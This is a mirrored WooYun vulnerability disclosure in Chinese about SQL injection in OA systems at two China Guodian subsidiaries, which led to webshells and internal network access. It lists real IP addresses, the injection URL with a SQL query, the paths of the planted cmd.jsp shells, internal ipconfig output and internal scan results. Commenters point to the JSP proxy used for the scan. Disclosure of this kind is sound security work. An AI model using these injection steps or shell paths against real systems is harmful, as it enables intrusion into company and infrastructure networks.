中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

admin 2017年4月28日01:47:52评论387 views字数 238阅读0分47秒阅读模式
摘要

2016-03-07: 细节已通知厂商并且等待厂商处理中
2016-03-07: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-12: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2016-182065

漏洞标题: 中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

相关厂商: 中国国电集团公司

漏洞作者: 路人甲

提交时间: 2016-03-07 23:48

公开时间: 2016-03-12 23:50

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: Mysql 字符类型注射

2人收藏


漏洞详情

披露状态:

2016-03-07: 细节已通知厂商并且等待厂商处理中
2016-03-07: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

涉及到内网安全

详细说明:

code 区域
http://60.13.13.239:8080/yyoa/

http://60.13.13.239:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database()

code 区域
序号 @@basedir
1 D:/Program Files/UFseeyon/OA/mysql/bin/../

具体拿shell方法见

code 区域
 WooYun: 东方航空传媒公司一个被忽略漏洞引发的血案(可getshell) 

得到shell

code 区域
http://60.13.13.239:8080/yyoa/wel.jsp
http://60.13.13.239:8080/yyoa/cmd.jsp

中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

ipconfig

code 区域
以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::50fc:d4c8:8aee:b822%11
IPv4 地址 . . . . . . . . . . . . : 10.100.130.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.100.130.254

传了一个内网扫描的jsp代理

code 区域
http://10.100.130.4 >> >>Apache-Coyote/1.1 >>Success
http://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.6 >> ���>>Apache >>Success
http://10.100.130.101 >> ���>>Apache >>Success
http://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
http://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success

一些内部文档信息和log

中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

漏洞证明:

code 区域
http://222.89.154.134:8080/yyoa/

shell地址:

http://222.89.154.134:8080/yyoa/cmd.jsp

中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

修复方案:

升级程序,打补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-12 23:50

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-13 11:38 | 有归于无 ( 普通白帽子 | Rank:127 漏洞数:27 | 有归于无)

    1

    请问下帅比用的什么内网扫描JSP代理

  2. 2016-03-13 13:15 | theone ( 实习白帽子 | Rank:50 漏洞数:9 | hodor,hodor)

    1

    @有归于无 out.jsp

  3. 2016-03-13 14:22 | 默之 ( 普通白帽子 | Rank:1615 漏洞数:254 | 沉淀。)

    1

    @theone @有归于无 http://zone.wooyun.org/content/22868

  4. 2016-03-14 20:03 | 有归于无 ( 普通白帽子 | Rank:127 漏洞数:27 | 有归于无)

    1

    @theone @默之 感谢两位帅比

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin